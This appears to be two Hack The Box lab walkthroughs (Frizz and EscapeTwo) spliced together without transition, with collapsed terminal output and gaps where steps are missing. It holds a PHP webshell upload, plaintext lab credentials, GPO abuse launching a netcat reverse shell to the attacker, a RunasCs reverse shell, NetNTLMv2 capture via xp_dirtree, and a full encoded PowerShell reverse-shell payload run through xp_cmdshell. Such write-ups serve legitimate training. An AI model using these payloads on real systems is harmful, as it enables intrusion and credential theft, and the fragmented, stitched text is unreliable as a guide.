Anonymous LDAP lookup failed, need a valid credential.
croc@hacker$ldapsearch-x-Hldap://frizzdc.frizz.htb-D''-w''-b'DC=frizz,DC=htb'# extended LDIF## LDAPv3# base <DC=frizz,DC=htb> with scope subtree# filter: (objectclass=*)# requesting: ALL## search resultsearch:2result:1Operationserrortext:000004DC:LdapErr:DSID-0C090CB6,comment:Inordertoperformthisoperationasuccessfulbindmustbecompletedontheconnection.,data0,v4f7c# numResponses: 1
SMB – 445/TCP
No luck with null authentication. A STATUS_NOT_SUPPORTED error appears indicating that the type of authentication mechanism being used is not supported.
croc@hacker$nxcsmbfrizzdc.frizz.htb-u''-p''--sharesSMB10.10.11.6044510.10.11.60 [*] x64 (name:10.10.11.60)(domain:10.10.11.60)(signing:True)(SMBv1:False)SMB10.10.11.6044510.10.11.60 [-] 10.10.11.60\: STATUS_NOT_SUPPORTED SMB10.10.11.6044510.10.11.60 [-] IndexError: list index out of rangeSMB10.10.11.6044510.10.11.60 [-] Error enumerating shares: Error occurs whilereadingfromremote(104)croc@hacker$nxcsmbfrizzdc.frizz.htb-u'guest'-p''--sharesSMB10.10.11.6044510.10.11.60 [*] x64 (name:10.10.11.60)(domain:10.10.11.60)(signing:True)(SMBv1:False)SMB10.10.11.6044510.10.11.60 [-] 10.10.11.60\guest: STATUS_NOT_SUPPORTED
💡 Think Box
From here, my next go-to is HTTP(80) where an Apache Web Server is running. I will start by checking out the functionality of the site and try to understand the business logic.
HTTP – 80/TCP
Main Page
The IP address of the box, 10.10.11.60 redirected to frizzdc.frizz.htb/home. This looks like a school website for the Walkerville Elementary School.
The following looks like base64 encoded text which may be interesting.
ChatGPT decoded it for me and it says:
Want to learn hacking but don't want to go to jail? You'll learn the in's and outs of Syscalls and XSS from the safety of international waters and iron clad contracts from your customers, reviewed by Walkerville s finest attorneys.
Staff Login – Gibbon LMS
On the Staff Login Page, I found out that the Gibbon LMS v25.0.00 is in use which is an open-source learning management system designed for educational institutions.
Read the Notice carefully:
*NOTICE** Due to unplanned Pentesting by students, WES is migrating applications and tools to stronger security protocols. During this transition, Ms. Fiona Frizzle will be migrating Gibbon to utilize our Azure Active Directory SSO. Please note this might take 48 hours where your accounts will not be available. Please bear with us, and thank you for your patience. Anything that can not utilize Azure AD will use the strongest available protocols such as Kerberos.
💡 Think Box
First, we have a name that might help us guess a username. Second, I suspect NTLM authentication is disabled on this machine. Third, knowing the exact Gibbon version allows us to search for relevant CVEs.
Forgot Password
On the Forgot Password page, we have username validation. Following is a failed attempt where the email address tried doesn’t exist.
On the other hand, trying out a bunch of different combinations for Ms. Fiona Frizzle i.e. Firstinitial Lastname or firstname.lastname, I found a valid username of f.frizzle@frizz.htb:
Keep that intel in your back pocket for now…. At this point, I have tested all the clickable areas of the website and understood the underlying functionality. Thus, we’re done with the Happy Path Testing & it’s time to move on to Unhappy Path Testing.
CVEs Enumeration – Gibbon v25.0.0
Initially, I looked for exploits for Gibbon v25.0.0 & found a LFI exploit but that turned out to be a rabbit hole as I didn’t find anything useful in gibbon.sql file with that.
After that, I decided to look for vulnerabilities in higher versions and found two of them:
Using this PoC, I uploaded the payload <?php echo system($_GET['cmd'])?> to the file croc.php on the server. Below is the POST request and the response:
REQUEST:
Note that the base installation directory of Gibbon in our scenario is Gibbon-LMS as seen in the URL here.
According to the mysql configuration file in-use here, it is utilizing the default port of 3306/tcp:
PSC:\xampp\htdocs\Gibbon-LMS>Get-ContentC:\xampp\mysql\bin\my.ini# Example MySQL config file for small systems.## This is for a system with little memory (<= 64M) where MySQL is only used# from time to time and it's important that the mysqld daemon# doesn't use much resources.## You can copy this file to# C:/xampp/mysql/bin/my.cnf to set global options,# mysql-data-dir/my.cnf to set server-specific options (in this# installation this directory is C:/xampp/mysql/data) or# ~/.my.cnf to set user-specific options.## In this file, you can use all long options that a program supports.# If you want to know which options a program supports, run the program# with the "--help" option.# The following options will be passed to all MySQL clients[client]# password = your_password port=3306socket="C:/xampp/mysql/mysql.sock"....
We can indeed verify that mysql is actively listening for incoming connections on 3306:
Now, we can connect to the database using the credentials we already have:
croc@hacker$mysql-h127.0.0.1-P33061-uMrGibbonsDB-p'MisterGibbs!Parrot!?1'--skip-sslWelcometotheMariaDBmonitor.Commandsendwith;or \g.YourMariaDBconnectionidis1219Serverversion:10.4.32-MariaDBmariadb.orgbinarydistributionCopyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.SupportMariaDBdevelopersbygivingastarathttps://github.com/MariaDB/serverType'help;'or'\h'forhelp.Type'\c'toclearthecurrentinputstatement.MariaDB [(none)]>
--skip-ssl is used to bypass encryption checks which were causing an error.
Shell as f.frizzle
Database Enumeration
I went off by listing the databases and selected the gibbon database.
MariaDB [(none)]> show databases;+--------------------+| Database |+--------------------+| gibbon || information_schema || test |+--------------------+3rowsinset (0.347 sec)MariaDB [(none)]>use gibbon;Reading table information for completion of tableand column namesYou can turn off this feature toget a quicker startup with-ADatabase changed
After that, upon listing the tables, I was bombarded with 191 entries. That’s exhausting, right? So, what I did instead is modify my SQL query to only return tables that have rows greater than 0. It’s much better now!
Looking up on Google for tables where the personal information of users might be stored, I found this forum where they state gibbonPerson table to be the one.
Gladly, we have found a password hash along with a salt. The hash looks like a sha-256 based on its length(64-character hex string).
However, we also want to know the positioning of salt in the hash before trying to crack it. Upon searching on Google, I found that the hash processing is done in the core/preferencesPasswordProcess.php file, where core is Gibbon-LMS in our case.
Hence, the password for f.frizzle is Jenni_Luvs_Magic23.
🚀Way Forward
f.frizzle is part of the Remote Management Users group but unfortunately WinRM is disabled on the box. So, for now, as we have a valid set of credential, we can proceed to dump the bloodhound data and analyze potential pathways from there.
Bloodhound Collection
After getting hit by a dozen DNS errors, I finally succeeded in dumping the data. I also uploaded it into Bloodhound.
faketime is used in order to tackle the KRB_AP_ERR_SKEW error.
💡 Think Box
Enumerating all possible paths from f.frizzle, I found nothing that could lead us to further access. So, I went back to see what else do we have and saw SSH open. As Kerberos Authentication is a requirement, we need to do some configuration beforehand.
Setting up Kerberos Authentication
Step 01 – Install Client Libraries
If you are faced with any prompts during the installation, just remember to press the magic key “Enter” & go with the defaults.
I set up the environment variable KRB5_CONFIG to point to our custom Kerberos configuration file custom_krb5.conf located in our current directory ($PWD). This allows us force Kerberos clients to use custom realm configuration.
Moreover, I initiated an authentication request as f.frizzle to the KDC using kinit, which got successful. As a result, we have a cached credential at /tmp/krb5cc_1001 which we can view using klist.
Revisiting Bloodhound, I found that m.schoolbus is the member of the Desktop Admins group which is indeed the member of Group Policy Creator Owners group.
According to Microsoft,
"This group is authorized to create, edit, and delete Group Policy Objects in the domain. By default, the only member of the group is Administrator."
💡 Think Box
Hence, it’s a great time to enumerate GPOs on the target and see what we can get.
Transfer Powersploit
We will be using the Powersploit suite of tools for GPO enumeration.
gitclonehttps://github.com/PowerShellMafia/PowerSploitrm-rfPowerSploit/.git/#Removed as it is not neededzip-rPowerSploit.zipPowerSploitpython3-mhttp.server8000
Next, we downgrade to PowerShell v5 in order to make it work reliably:
PSC:\temp> $PSVersionTableNameValue---------PSVersion7.4.5#BeforePSEditionCoreGitCommitId7.4.5OSMicrosoftWindows10.0.20348PlatformWin32NTPSCompatibleVersions{1.0,2.0,3.0,4.0…}PSRemotingProtocolVersion2.3SerializationVersion1.1.0.1WSManStackVersion3.0PSC:\temp>powershell.exeWindowsPowerShellCopyright (C) Microsoft Corporation. All rights reserved.InstallthelatestPowerShellfornewfeaturesandimprovements!https://aka.ms/PSWindowsPSC:\temp> $PSVersionTableNameValue---------PSVersion5.1.20348.2849#AfterPSEditionDesktopPSCompatibleVersions{1.0,2.0,3.0,4.0...}BuildVersion10.0.20348.2849CLRVersion4.0.30319.42000WSManStackVersion3.0PSRemotingProtocolVersion2.3SerializationVersion1.1.0.1
Since none of the existing GPOs are writable by our user m.schoolbus, we should explore creating a new GPO and linking it to a writable OU.
Looking for Writable OUs
We used the following command to enumerate writable OUs in our domain. Luckily, there exist only two OUs and both of them are writable by our current user.
Hence, we can link our new GPO to any of the both OUs: Domain Controllers or Class_Frizz. However, our target machine is in the Domain Controllers Organizational Unit so it makes more sense to link to that.
PSC:\temp>&"C:\temp\SharpGPOAbuse.exe"--AddComputerTask--TaskName"EvilTask"--Author"FRIZZ.HTB\Administrator"--Command"cmd.exe"--Arguments"/c C:\Windows\Tasks\nc64.exe 10.10.14.182 443 -e powershell.exe"--GPOName"Evil Croc GPO"--Force[+] Domain = frizz.htb[+] Domain Controller = frizzdc.frizz.htb[+] Distinguished Name = CN=Policies,CN=System,DC=frizz,DC=htb[+] GUID of "Evil Croc GPO" is: {5C5DC385-1956-47B8-B432-376A3A580DBE}[+] Creating file \\frizz.htb\SysVol\frizz.htb\Policies\{5C5DC385-1956-47B8-B432-376A3A580DBE}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml[+] versionNumber attribute changed successfully[+] The version number in GPT.ini was increased successfully.[+] The GPO was modified to include a new immediate task. Wait for the GPO refresh cycle.[+] Done!
Successfully obtained a reverse shell as nt\authority system:
Way #02: Gaining Root – Adding a Local Admin
We can also make our user m.schoolbus a local admin on the DC and then initiate a reverse shell connection under his proximity to get admin privileges:
PSC:\temp>&"C:\temp\SharpGPOAbuse.exe"--AddLocalAdmin--UserAccount'M.schoolbus'--GPOName"Evil Croc GPO"--force[+] Domain = frizz.htb[+] Domain Controller = frizzdc.frizz.htb[+] Distinguished Name = CN=Policies,CN=System,DC=frizz,DC=htb[+] SID Value of M.schoolbus = S-1-5-21-2386970044-1145388522-2932701813-1106[+] GUID of "Evil Croc GPO" is: {48753DD8-2CF7-4859-8BA3-4056612363FD}[+] Creating file \\frizz.htb\SysVol\frizz.htb\Policies\{48753DD8-2CF7-4859-8BA3-4056612363FD}\Machine\Microsoft\WindowsNT\SecEdit\GptTmpl.inf[+] versionNumber attribute changed successfully[+] The version number in GPT.ini was increased successfully.[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.[+] Done!PSC:\temp>gpupdate.exe/forceUpdatingpolicy...ComputerPolicyupdatehascompletedsuccessfully.UserPolicyupdatehascompletedsuccessfully.
However, note that the members of the local admin group are not allowed to SSH into the machine:
PSC:\temp>catC:\ProgramData\ssh\sshd_config
So, we need to figure another way out.
💡 Think Box
What we can do is use RunasCS in order to execute commands as the m.schoolbus and initiate a reverse shell connection through it which will give us admin privileges.
RunasCS – Reverse Shell as admin
Set up a listener on your machine on whatever port and execute the following command on the target:
PSC:\temp>Import-Module.\Invoke-RunasCs.ps1PSC:\temp>Invoke-RunasCs'M.schoolbus''!suBcig@MehTed!R'powershell.exe-Remote10.10.14.182:5555[+] Running in session 0 with process functionCreateProcessWithLogonW()[+] Using Station\Desktop: Service-0x0-2c55b3$\Default[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 740 created in background.PS C:\temp>
And, we received a connection back as the local admin m.schoolbus:
croc@hacker:~$sudorlwrapnc-nvlp5555listeningon [any] 5555 ...connectto [10.10.14.182] from (UNKNOWN)[10.10.11.60] 55947WindowsPowerShellCopyright (C) Microsoft Corporation. All rights reserved.InstallthelatestPowerShellfornewfeaturesandimprovements!https://aka.ms/PSWindowsPSC:\Windows\system32>whoamiwhoamifrizz\m.schoolbusPSC:\Windows\system32>whoami/privwhoami/privPRIVILEGESINFORMATION----------------------PrivilegeNameDescriptionState========================================= ==========================================================================SeIncreaseQuotaPrivilegeAdjustmemoryquotasforaprocessDisabledSeMachineAccountPrivilegeAddworkstationstodomainDisabledSeSecurityPrivilegeManageauditingandsecuritylogDisabledSeTakeOwnershipPrivilegeTakeownershipoffilesorotherobjectsDisabledSeLoadDriverPrivilegeLoadandunloaddevicedriversDisabledSeSystemProfilePrivilegeProfilesystemperformanceDisabledSeSystemtimePrivilegeChangethesystemtimeDisabledSeProfileSingleProcessPrivilegeProfilesingleprocessDisabledSeIncreaseBasePriorityPrivilegeIncreaseschedulingpriorityDisabledSeCreatePagefilePrivilegeCreateapagefileDisabledSeBackupPrivilegeBackupfilesanddirectoriesDisabledSeRestorePrivilegeRestorefilesanddirectoriesDisabledSeShutdownPrivilegeShutdownthesystemDisabledSeDebugPrivilegeDebugprogramsEnabledSeSystemEnvironmentPrivilegeModifyfirmwareenvironmentvaluesDisabledSeChangeNotifyPrivilegeBypasstraversecheckingEnabledSeRemoteShutdownPrivilegeForceshutdownfromaremotesystemDisabledSeUndockPrivilegeRemovecomputerfromdockingstationDisabledSeEnableDelegationPrivilegeEnablecomputeranduseraccountstobetrustedfordelegationDisabledSeManageVolumePrivilegePerformvolumemaintenancetasksDisabledSeImpersonatePrivilegeImpersonateaclientafterauthenticationEnabledSeCreateGlobalPrivilegeCreateglobalobjectsEnabledSeIncreaseWorkingSetPrivilegeIncreaseaprocessworkingsetDisabledSeTimeZonePrivilegeChangethetimezoneDisabledSeCreateSymbolicLinkPrivilegeCreatesymboliclinksDisabledSeDelegateSessionUserImpersonatePrivilegeObtainanimpersonationtokenforanotheruserinthesamesessionDisabledPSC:\Windows\system32>
As it is common in real life windows pentests, we’re given a set of credentials to start:
rose/KxEPkKe6R8su
nmap/TCP
nmap detected a bunch of ports being open which is typical for a Domain Controller:
croc@hacker$rustscan-a10.10.11.51--ulimit5000---A-T5-Pn-oAInitial[~] Automatically increasing ulimit value to 5000.Open10.10.11.51:53Open10.10.11.51:88Open10.10.11.51:139Open10.10.11.51:135Open10.10.11.51:389Open10.10.11.51:464Open10.10.11.51:445Open10.10.11.51:593Open10.10.11.51:636Open10.10.11.51:1433Open10.10.11.51:3269Open10.10.11.51:3268Open10.10.11.51:5985Open10.10.11.51:9389[~] Starting Nmap[>] The Nmap command to be run is nmap -A -T5 -Pn -oA Initial -vvv -p 53,88,139,135,389,464,445,593,636,1433,3269,3268,5985,9389 10.10.11.51StartingNmap7.94SVN ( https://nmap.org ) at 2025-01-14 05:28 ESTNmapscanreportfor10.10.11.51Hostisup,receiveduser-set (0.43s latency).Scannedat2025-01-1405:28:28ESTfor76sPORTSTATESERVICEREASONVERSION53/tcpfiltereddomainno-response88/tcpopenkerberos-secsyn-ackMicrosoftWindowsKerberos (server time:2025-01-1410:28:44Z)135/tcpopenmsrpcsyn-ackMicrosoftWindowsRPC139/tcpopennetbios-ssnsyn-ackMicrosoftWindowsnetbios-ssn389/tcpopenldapsyn-ackMicrosoftWindowsActiveDirectoryLDAP|_ssl-date:2025-01-14T10:38:18+00:00;+5sfromscannertime.|ssl-cert:Subject:commonName=DC01.sequel.htb|SubjectAlternativeName:othername:1.3.6.1.4.1.311.25.1::<unsupported>,DNS:DC01.sequel.htb|Issuer:commonName=sequel-DC01-CA/domainComponent=sequel|PublicKeytype:rsa|PublicKeybits:2048|SignatureAlgorithm:sha256WithRSAEncryption|Notvalidbefore:2024-06-08T17:35:00|Notvalidafter:2025-06-08T17:35:00|MD5:09fd:3df4:9f58:da05:410d:e89e:7442:b6ff|SHA-1:c3ac:8bfd:6132:ed77:2975:7f5e:6990:1ced:528e:aac5464/tcpopenkpasswd5?syn-ack593/tcpopenncacn_httpsyn-ackMicrosoftWindowsRPCoverHTTP1.0636/tcpopenssl/ldapsyn-ackMicrosoftWindowsActiveDirectoryLDAP1433/tcpopenms-sql-ssyn-ackMicrosoftSQLServer201915.00.2000.00;RTM|ms-sql-ntlm-info:|10.10.11.51:1433:|Target_Name:SEQUEL|NetBIOS_Domain_Name:SEQUEL|NetBIOS_Computer_Name:DC01|DNS_Domain_Name:sequel.htb|DNS_Computer_Name:DC01.sequel.htb|DNS_Tree_Name:sequel.htb|_Product_Version:10.0.17763|ms-sql-info:|10.10.11.51:1433:|Version:|name:MicrosoftSQLServer2019RTM|number:15.00.2000.00|Product:MicrosoftSQLServer2019|Servicepacklevel:RTM|Post-SPpatchesapplied:false|_TCPport:1433|ssl-cert:Subject:commonName=SSL_Self_Signed_Fallback|Issuer:commonName=SSL_Self_Signed_Fallback|PublicKeytype:rsa|PublicKeybits:2048|SignatureAlgorithm:sha256WithRSAEncryption|Notvalidbefore:2025-01-14T10:04:21|Notvalidafter:2055-01-14T10:04:21|MD5:476a:4f89:0d42:a766:8e26:4556:d99b:5ee2|SHA-1:6d9a:8222:9485:11e0:e510:7070:622a:b20c:de49:3318|_ssl-date:2025-01-14T10:29:43+00:00;+4sfromscannertime.3268/tcpopenldapsyn-ackMicrosoftWindowsActiveDirectoryLDAP3269/tcpopenssl/ldapsyn-ackMicrosoftWindowsActiveDirectoryLDAP (Domain: sequel.htb0.,Site:Default-First-Site-Name)|ssl-cert:Subject:commonName=DC01.sequel.htb|SubjectAlternativeName:othername:1.3.6.1.4.1.311.25.1::<unsupported>,DNS:DC01.sequel.htb|Issuer:commonName=sequel-DC01-CA/domainComponent=sequel|PublicKeytype:rsa|PublicKeybits:2048|SignatureAlgorithm:sha256WithRSAEncryption|Notvalidbefore:2024-06-08T17:35:00|Notvalidafter:2025-06-08T17:35:00|MD5:09fd:3df4:9f58:da05:410d:e89e:7442:b6ff|SHA-1:c3ac:8bfd:6132:ed77:2975:7f5e:6990:1ced:528e:aac5|_ssl-date:2025-01-14T10:29:43+00:00;+5sfromscannertime.5985/tcpopenhttpsyn-ackMicrosoftHTTPAPIhttpd2.0 (SSDP/UPnP)|_http-server-header:Microsoft-HTTPAPI/2.0|_http-title:NotFound9389/tcpopenmc-nmfsyn-ack.NETMessageFraming49665/tcpopenmsrpcsyn-ackMicrosoftWindowsRPC49666/tcpopenmsrpcsyn-ackMicrosoftWindowsRPC49667/tcpopenmsrpcsyn-ackMicrosoftWindowsRPCServiceInfo:Host:DC01;OS:Windows;CPE:cpe:/o:microsoft:windowsHostscriptresults:|_clock-skew:mean:3s,deviation:0s,median:3sServicedetectionperformed.Pleasereportanyincorrectresultsathttps://nmap.org/submit/.# Nmap done at Tue Jan 14 05:38:14 2025 -- 1 IP address (1 host up) scanned in 111.16 seconds
We can see DC01.sequel.htb from output of multiple ports, so let’s add that into the hosts file:
I dumped the .json files using the Python BloodHound Ingestor and fed that into bloodhound:
croc@hacker$python3-mbloodhound-dsequel.htb-u'rose'-p'KxEPkKe6R8su'-ns10.10.11.51-callINFO:FoundADdomain:sequel.htbINFO:GettingTGTforuserWARNING:FailedtogetKerberosTGT.FallingbacktoNTLMauthentication.Error: [Errno Connectionerror (dc01.sequel.htb:88)] [Errno -2] Name or service not knownINFO:ConnectingtoLDAPserver:dc01.sequel.htbINFO:Found1domainsINFO:Found1domainsintheforestINFO:Found1computersINFO:ConnectingtoLDAPserver:dc01.sequel.htbINFO:Found10usersINFO:Found59groupsINFO:Found2gposINFO:Found1ousINFO:Found19containersINFO:Found0trustsINFO:Startingcomputerenumerationwith10workersINFO:Queryingcomputer:DC01.sequel.htbINFO:Donein03M11Scroc@hacker:~/HTB/Escapetwo/bloodhound$ls20250113011955_computers.json20250113011955_domains.json20250113011955_groups.json20250113011955_users.json20250113011955_containers.json20250113011955_gpos.json20250113011955_ous.json
I found a pair of kerberoastable users in here so my next step would be to try kerberoasting. (Although that didn’t work out!)
Kerberoastable Users
Kerberoasting
Service Tickets
I got the service tickets for two accounts: sql_svc & ca_svc
I downloaded both the files which upon seeing seems to be excel files but if we look at the file types, they’re actually .zip files and we can just use the standard unzip tool to extract the archive data.
We found the following credentials: (Refined Form)
Username
Password
angela
0fwz7Q4mSpurIt99
oscar
86LxLBMgEWaKUnBG
kevin
Md9Wlq1E5bZnVDVo
sa
MSSQLP@ssw0rd!
Validating the Found Credentials
Note that the user sawas not found under the domain accounts we enumerated initially. What is sa by default?
The sa user in an Active Directory (AD) or Windows environment typically refers to the SQL Server System Administrator account. The SQL Server has two authentication modes:
Windows Authentication: Uses AD credentials.
SQL Server Authentication: Uses specific SQL accounts like sa.
That’s why, I didn’t include sa in validation via nxc but I left it’s password in the passwords.txt file in case it is being reused.
So we only have one valid set of credential which is of oscar. However, he is a low-privileged user and didn’t benefit me in any way. Now, what???
💡 Think Box
We have mssqlbeing open on port 1433/tcpso we can attempt to gain a shell using impacket-mssqlclient as the sa user with it’s password of ‘MSSQLP@ssw0rd!‘ which we found above.
Shell as sql_svc
MSSQL Authentication – 1433/tcp
impacket-mssqlclient
I gained shell access as the sa user:
croc@hacker$impacket-mssqlclientsequel.htb/sa:'MSSQLP@ssw0rd!'@10.10.11.51Impacketv0.12.0-CopyrightFortra,LLCanditsaffiliatedcompanies[*] Encryption required, switching to TLS[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.[*] ACK: Result: 1 - Microsoft SQL Server (1507208)[!] Press help for extra shell commandsSQL (sa dbo@master)>
Now from here, I can think of two possibilities:
Capture a NetNTLMv2 hash and try to crack it.(Didn’t work here!)
Reverse Shell
I will be doing both of them here.
Capturing a NetNTLMv2 Hash & Cracking it
Step#1: Set up a Rogue SMB Server
I set up a SMB server using impacket-smbserver on my kali machine for the purpose of capturing the hash. Note that you can also use responder on tun0 interface to capture the hash.
I pointed the SQL Server to the SMB Server running on my Kali Machine:
SQL (sa dbo@master)> enable_xp_cmdshell[*] INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.[*] INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.SQL (sa dbo@master)> xp_cmdshell dir \\10.10.16.32\supportmeonpatreonoutput--------------------------------------------------------------------------------Youcan't access this shared folder because your organization'ssecuritypoliciesblockunauthenticatedguestaccess.ThesepolicieshelpprotectyourPCfromunsafeormaliciousdevicesonthenetwork.NULLSQL (sa dbo@master)>
You can also use xp_dirtree \\10.10.16.32\supportmeonpatreon in order to point the server to your machine. Both of these commands will get the service to try and access the folder at the UNC path in order to list its contents. It will authenticate to it giving out a hash.
However, xp_dirtree is quieter than that of xp_cmdshell dir.
3. However, that didn’t crack so let’s move on to the second possibility.
Reverse Shell
Now, there are a number of different ways to get a reverse shell here as we have command execution. I used Villian to obtain a reverse shell in this case because I want to try out some new tools.
Step#1: Fire up Villian & Generate the Payload
croc@hacker:/opt/Villain$sudopython3Villain.py┬┬┬┬┬┌─┐┬┌┐┌└┐┌┘│││├─┤││││└┘┴┴─┘┴─┘┴┴┴┘└┘Unleashed[Meta] Created by t3l3machus[Meta] Follow on GitHub, X, YT: @t3l3machus[Meta] Thank you![Info] Initializing required services:[0.0.0.0:6501]::Team Server[0.0.0.0:4443]::Reverse TCP Multi-Handler[0.0.0.0:8080]::HoaxShell Multi-Handler[0.0.0.0:8888]::HTTP File Smuggler[Info] Welcome!Type"help"tolistavailablecommands.Villain>generatepayload=windows/reverse_tcp/powershelllhost=10.10.16.32encodeGeneratingpayload...powershell-epbypass-eUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAUABTAEgATwBNAEUAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAewAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBvAGMAawBlAHQAcwAuAFQAQwBQAEMAbABpAGUAbgB0ACgAJwAxADAALgAxADAALgAxADYALgAzADIAJwAsADQANAA0ADMAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACcAUABTACAAJwAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACcAPgAgACcAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkAfQAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4ACopiedtoclipboard!
Step#2: Execute the Payload
I executed the above payload using xp_cmdshell:
SQL>enable_xp_cmdshell[*] INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.[*] INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.SQL>xp_cmdshellpowershell-epbypass-eUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAUABTAEgATwBNAEUAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAewAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBvAGMAawBlAHQAcwAuAFQAQwBQAEMAbABpAGUAbgB0ACgAJwAxADAALgAxADAALgAxADYALgAzADIAJwAsADQANAA0ADMAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACcAUABTACAAJwAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACcAPgAgACcAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkAfQAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4A
Step#3: Session Established
We got a reverse shell session back:
Villain>[Shell] 0501eb-dcc6db-67c8eb - New session established -> 10.10.11.51 at 2025-01-15 00:01:56.Villain>sessionsSessionIDIPAddressOSTypeUserOwnerStatus---------------------------------------------------------------0501eb-dcc6db-67c8eb10.10.11.51WindowsSEQUEL\sql_svcSelfActiveVillain>shell0501eb-dcc6db-67c8ebInteractivepseudo-shellactivated.PressCtrl+Cortype"exit"todeactivate.PSC:\Windows\system32>whoamisequel\sql_svc
Shell as Ryan
SQL Configuration File
1. I found the SQL2019 directory in the C: drive. It really looks out of place so that might be interesting to look into!
